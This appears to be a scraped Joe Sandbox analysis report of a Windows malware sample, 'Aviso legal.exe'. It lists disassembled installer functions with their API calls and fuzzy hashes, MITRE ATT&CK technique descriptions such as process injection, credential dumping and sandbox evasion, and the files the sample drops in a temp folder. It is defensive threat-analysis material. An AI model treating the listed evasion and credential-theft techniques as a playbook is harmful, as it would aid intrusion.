Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Function 00405A6E Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00442800), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 4u,?,00442800,00405C69,?,75E03420,00442800,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4u,?,00442800,00405C69,?,75E03420,00442800,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4u,?,00442800,00405C69,?,75E03420,00442800), ref: 00405F7D

Strings

4u, xrefs: 00405F16

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4u
API String ID: 3248276644-3553953750
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Function 0040605C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040607A
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040352B,00442000,00442800,00442800,00442800,00442800,00442800,00442800,00403810), ref: 00406095

Strings

nsa, xrefs: 00406069

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 0000000A.00000002.6045408190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.6045319128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045498972.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045751760.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000A.00000002.6045835944.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_Aviso legal.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Aviso legal.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\geokemi\Alarmsystemerne.Cos

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Affotograferes.und

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Blowfish77.eil

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\minkfishes.uds

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\partiality.ste

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\stopcocks.uns

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid\trstegningerne.txt

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\audifon.bul

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\bisecting.ove

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\bricklayings.non

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\cardiographs.uop

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\concubinage.ind

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\fritnkeri.els

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\maskningerne.aft

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\atriumerne.eli

C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\sexualizing.Tro144

C:\Users\user\AppData\Local\Temp\nsbA808.tmp

C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll

Windows Analysis Report
Aviso legal.exe

Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

